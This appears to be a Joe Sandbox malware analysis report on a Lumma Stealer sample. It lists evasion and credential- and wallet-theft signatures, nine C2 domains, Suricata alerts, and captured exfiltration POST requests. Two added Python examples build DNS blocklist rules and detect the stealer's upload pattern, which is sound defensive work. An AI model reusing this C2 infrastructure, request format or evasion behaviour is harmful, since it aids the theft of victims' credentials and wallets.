
Windows Analysis Report
ARoqFi68Nr.exe

Overview

General Information

Sample name: ARoqFi68Nr.exe (renamed because the original name is a hash value)
Original sample name: d867e39681dbe1564bcdd21d773e668b.exe
Analysis ID: 1581229
MD5: d867e39681dbe1564bcdd21d773e668b
SHA1: c8c855e1ff585fdf76e7bb28001fa025a0b201cb
SHA256: d0003288a5022dd1f2af3d6aaec3236c57163e5884cc24909d9175de96c0d734
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ARoqFi68Nr.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\ARoqFi68Nr.exe" MD5: D867E39681DBE1564BCDD21D773E668B)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC): {"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "prisonyfork.buzz", "inherineau.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}
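As an added example (not part of the Joe Sandbox report and not Lumma's own code), the following Python turns the extracted configuration above into a normalised C2 domain set, emits one Suricata `dns.query` rule per domain, and runs the set over a few constructed DNS log lines so that subdomains of a C2 host match while look-alike names such as `notmindhandru.buzz` do not. The log line format, the local SID range starting at 1000001, and the log lines themselves are assumptions.

```python
"""Turn the extracted LummaC configuration into a C2 blocklist and Suricata
DNS rules, then hunt for the blocklist in DNS logs.
Added example; not part of the Joe Sandbox report."""
import json
import re
from typing import Optional

# Configuration exactly as the report's Malware Configuration Extractor printed it.
LUMMA_CONFIG = json.loads(
    '{"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", '
    '"prisonyfork.buzz", "inherineau.buzz", "appliacnesot.buzz", '
    '"hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], '
    '"Build id": "LOGS11--LiveTraffic"}'
)


def c2_domains(config: dict) -> set:
    """Normalise the C2 list: lower-case, scheme and path stripped, no trailing dot."""
    out = set()
    for entry in config.get("C2 url", []):
        host = re.sub(r"^[a-z]+://", "", entry.strip().lower())
        host = host.split("/", 1)[0].rstrip(".")
        if host:
            out.add(host)
    return out


def suricata_dns_rules(domains, first_sid: int) -> list:
    """One dns.query rule per C2 domain. 'endswith' also catches subdomains;
    the SID range is an assumption (local rules live at >= 1000000)."""
    rules = []
    for i, d in enumerate(sorted(domains)):
        rules.append(
            'alert dns any any -> any any (msg:"LummaC C2 DNS query %s"; '
            'dns.query; content:"%s"; nocase; endswith; '
            'classtype:trojan-activity; sid:%d; rev:1;)' % (d, d, first_sid + i)
        )
    return rules


def matches_c2(qname: str, domains) -> Optional[str]:
    """Return the C2 domain that qname equals or is a subdomain of, else None.
    The '.' prefix check keeps 'notmindhandru.buzz' from matching 'mindhandru.buzz'."""
    q = qname.lower().rstrip(".")
    for d in domains:
        if q == d or q.endswith("." + d):
            return d
    return None


# Constructed DNS log lines (not from the report) in an assumed "ts client qname" form.
SAMPLE_DNS_LOG = """\
2024-12-27T08:52:44 192.168.2.7 mindhandru.buzz
2024-12-27T08:52:44 192.168.2.7 ocsp.digicert.com
2024-12-27T08:53:10 192.168.2.9 cdn.mindhandru.buzz
2024-12-27T08:53:11 192.168.2.9 notmindhandru.buzz
"""


def hunt(log_text: str, domains) -> list:
    """Return (timestamp, client, c2_domain) for every log line that hits the blocklist."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, client, qname = parts
        d = matches_c2(qname, domains)
        if d:
            hits.append((ts, client, d))
    return hits


if __name__ == "__main__":
    doms = c2_domains(LUMMA_CONFIG)
    for rule in suricata_dns_rules(doms, 1000001):
        print(rule)
    for hit in hunt(SAMPLE_DNS_LOG, doms):
        print("HIT", *hit)
```

The domain list is only the config embedded in this build; the report's own network traffic shows just one of the nine hosts (mindhandru.buzz) being contacted, so the other eight are fallbacks worth blocking before they are ever resolved.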
Yara matches

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: ARoqFi68Nr.exe PID: 7380 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: ARoqFi68Nr.exe PID: 7380 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: ARoqFi68Nr.exe PID: 7380 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:52:45.545108+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:47.713609+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:50.224169+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:52.705000+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:01.537276+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49733 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:04.266975+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49741 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:06.862831+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49748 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:12.098083+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:46.304703+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:48.566284+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:46.304703+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:48.566284+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:51.263028+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49703 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:06.873316+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.7 | 49748 | 104.21.11.101 | 443 | TCP

              AV Detection

              Source: ARoqFi68Nr.exeAvira: detected
              Source: https://mindhandru.buzz/yWAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/oAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/gAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/piOAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/apizAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/K7Avira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/WAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/piwAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/apiultiAvira URL Cloud: Label: malware
              Source: ARoqFi68Nr.exe.7380.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "prisonyfork.buzz", "inherineau.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}
              Source: ARoqFi68Nr.exe ReversingLabs: Detection: 55%
              Source: ARoqFi68Nr.exe Virustotal: Detection: 52%
              Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
              Source: ARoqFi68Nr.exe Joe Sandbox ML: detected
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
              Source: ARoqFi68Nr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49748 version: TLS 1.2

              Networking

              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49748 -> 104.21.11.101:443
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49763 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49748 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49741 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49733 -> 104.21.11.101:443
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 53
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=Y8OKL05051W3WH
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 12826
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=DTLPDGVYJ7
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 15034
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=EGAS4F6GYU
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 20359
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=0AWTW7811TE3B9RAFW
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 1228
                  Host: mindhandru.buzz
              Source: global traffic HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=OQWBW0WO8U7KNW
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 550868
                  Host: mindhandru.buzz
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic DNS traffic detected: DNS query: mindhandru.buzz
              Source: unknown HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: mindhandru.buzz
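The request lines above show the sequence the ET MALWARE rules key on: two small application/x-www-form-urlencoded POSTs to /api (8 and 53 bytes), then multipart/form-data POSTs to the same endpoint growing to 550868 bytes, all on TLS sessions carrying the JA3 a0e9f5d64349fb13191bc781f81f42e1. Note that the wire User-Agent is a Chrome/119 string even though the decrypted strings contain "TeslaBrowser/5.5", so a detection keyed on that user agent alone would miss this build. The following Python, added here and not part of the report, flags the check-in-then-upload sequence over HTTP transaction records reconstructed from those request lines; the record layout, the timestamps, the size thresholds, and the benign control row are assumptions.

```python
"""Flag the LummaC check-in-then-upload pattern in HTTP transaction records.
Added example; not part of the Joe Sandbox report. The record layout is an
assumed simplification of what a proxy or NSM HTTP log would carry."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class HttpTx:
    ts: str            # ISO-8601 timestamp, sortable as a string
    src: str           # client IP
    host: str          # Host header
    method: str
    uri: str
    content_type: str
    content_length: int
    user_agent: str
    ja3: str = ""      # JA3 of the TLS session that carried the request, if known


# JA3 the report ties to this sample's TLS sessions (Joe Sandbox View / ET SID 2028371).
KNOWN_BAD_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}
# Thresholds are assumptions, chosen so the observed sizes (8 and 53 vs 1228..550868) separate cleanly.
CHECKIN_MAX_BYTES = 128
UPLOAD_MIN_BYTES = 1024


def classify(tx: HttpTx) -> str:
    """'checkin' = tiny form-encoded POST, 'upload' = large multipart POST, else 'other'."""
    if tx.method != "POST":
        return "other"
    ct = tx.content_type.lower()
    if ct.startswith("application/x-www-form-urlencoded") and tx.content_length <= CHECKIN_MAX_BYTES:
        return "checkin"
    if ct.startswith("multipart/form-data") and tx.content_length >= UPLOAD_MIN_BYTES:
        return "upload"
    return "other"


def detect(txs) -> list:
    """Group by (client, host, uri) in time order and alert when a check-in is
    followed by at least one multipart upload on the same endpoint."""
    by_endpoint = defaultdict(list)
    for tx in sorted(txs, key=lambda t: t.ts):
        by_endpoint[(tx.src, tx.host, tx.uri)].append(tx)
    alerts = []
    for (src, host, uri), seq in by_endpoint.items():
        kinds = [classify(t) for t in seq]
        if "checkin" not in kinds:
            continue
        first = kinds.index("checkin")
        uploads = [t for t, k in zip(seq[first:], kinds[first:]) if k == "upload"]
        if not uploads:
            continue
        alerts.append({
            "src": src, "host": host, "uri": uri,
            "checkins": kinds.count("checkin"),
            "uploads": len(uploads),
            "bytes_out": sum(t.content_length for t in uploads),
            "bad_ja3": any(t.ja3 in KNOWN_BAD_JA3 for t in seq),
            "user_agent": seq[0].user_agent,
        })
    return alerts


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
JA3 = "a0e9f5d64349fb13191bc781f81f42e1"
FORM = "application/x-www-form-urlencoded"
MP = "multipart/form-data; boundary="

# Constructed from the request lines in the report, in the same order; timestamps are approximate.
SAMPLE_TXS = [
    HttpTx("2024-12-27T08:52:46", "192.168.2.7", "mindhandru.buzz", "POST", "/api", FORM, 8, UA, JA3),
    HttpTx("2024-12-27T08:52:48", "192.168.2.7", "mindhandru.buzz", "POST", "/api", FORM, 53, UA, JA3),
    HttpTx("2024-12-27T08:52:51", "192.168.2.7", "mindhandru.buzz", "POST", "/api", MP + "Y8OKL05051W3WH", 12826, UA, JA3),
    HttpTx("2024-12-27T08:52:53", "192.168.2.7", "mindhandru.buzz", "POST", "/api", MP + "DTLPDGVYJ7", 15034, UA, JA3),
    HttpTx("2024-12-27T08:53:02", "192.168.2.7", "mindhandru.buzz", "POST", "/api", MP + "EGAS4F6GYU", 20359, UA, JA3),
    HttpTx("2024-12-27T08:53:04", "192.168.2.7", "mindhandru.buzz", "POST", "/api", MP + "0AWTW7811TE3B9RAFW", 1228, UA, JA3),
    HttpTx("2024-12-27T08:53:07", "192.168.2.7", "mindhandru.buzz", "POST", "/api", MP + "OQWBW0WO8U7KNW", 550868, UA, JA3),
    # Constructed benign control: one large upload with no preceding tiny form POST must not alert.
    HttpTx("2024-12-27T08:55:00", "192.168.2.9", "files.example.com", "POST", "/upload", MP + "abc", 40000, UA, ""),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_TXS):
        print(alert)
```

The sequence check matters more than any single header: the user agent is a stock Chrome string and the endpoint is a generic /api, but a browser does not send a single-digit-byte form POST and then stream half a megabyte of multipart data to that same path on a keep-alive connection within a minute.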
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505392610.000000000111F000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596864489.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
